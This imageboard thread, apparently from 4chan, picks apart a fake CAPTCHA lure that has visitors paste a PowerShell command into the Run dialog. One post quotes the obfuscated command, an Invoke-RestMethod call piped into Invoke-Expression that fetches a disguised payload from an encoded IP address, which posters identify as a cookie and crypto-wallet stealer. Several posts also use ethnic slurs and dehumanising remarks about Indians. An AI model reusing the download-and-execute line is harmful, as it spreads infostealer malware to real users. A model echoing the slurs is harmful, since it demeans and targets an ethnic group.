It's sort of clever honestly.
Pajeet ingenuity
>>106805073so what does the expression do? delete system32
>>106805073kek jeetswhen we finally fix h1b and deport the ones that lied about credentials (and all the chain migrations they sponsored) those fuckers will probably be pretty good scammersmight have to geo-restrict most services harder
>>106805093I have no clue; i've never used powershell. Likely something to do with the website.
>>106805073>>106805093>>106805118Somebody decode the base64 please I'm lazy.powershell $WkhsT1VrbFITV2RKZW10b1NWUTkdoSIZFVnFTWHBWYUVsVWEycEhOZVRSVFhWVmExWjNZa1ZHYWxirm "OX4D.5492705/x.jpg' |Invoke-Expression;$WkhsT1VrbFITV2RKZW10bExWjNZa1ZHYWxK
>>106805137I suppose that semi-explains all of this going on when I reload the site. Also, here's the site I found the amazing captcha from.>https://thehealthycompulsive.com/archetypal-jung/gratification/
>>106805073may Jagannath crush every street shitting poopjeet
there's quite a lot of videos going over this and dissecting the powershell script it runshttps://www.youtube.com/watch?v=1tB5USD004wtldw its basically a infostealer that sends browser cookies/crypto wallets to someone running a c&c server
>>106805137the one I found was curling some powershell script to execute, they spam latest news, like when latest shooter name drops, suddenly top google results throw this fake cloudflare captcha at you, pretty impressive
>>106805073>first step: open run commandsurely to God people who's info is worth stealing aren't THIS stupid, right?
>>106805694most people dont know what win+r does lol
>>106805137neither of the strings are valid
>>106806017I think these $-prefixed strings are just there to obscure the actual payload which is embedded in the middle of the command (irm | invoke-expression)I'm no powershell expert, but those look like references to nonexistent variables, effectively making them no-ops
>>106805093would be funny if it was actually just a captcha
>>106806315>irm | invoke-expressionSo it uses Invoke-RestMethod to download a "JPG" from an obfuscated IP address and then runs it as a command.The IP is 4D in hex followed by the last 3 bytes of the IP encoded as an integer.
>>106806403insane that there are still applications that accept any form of ipv4 addresses other than 4 dot separated decimals
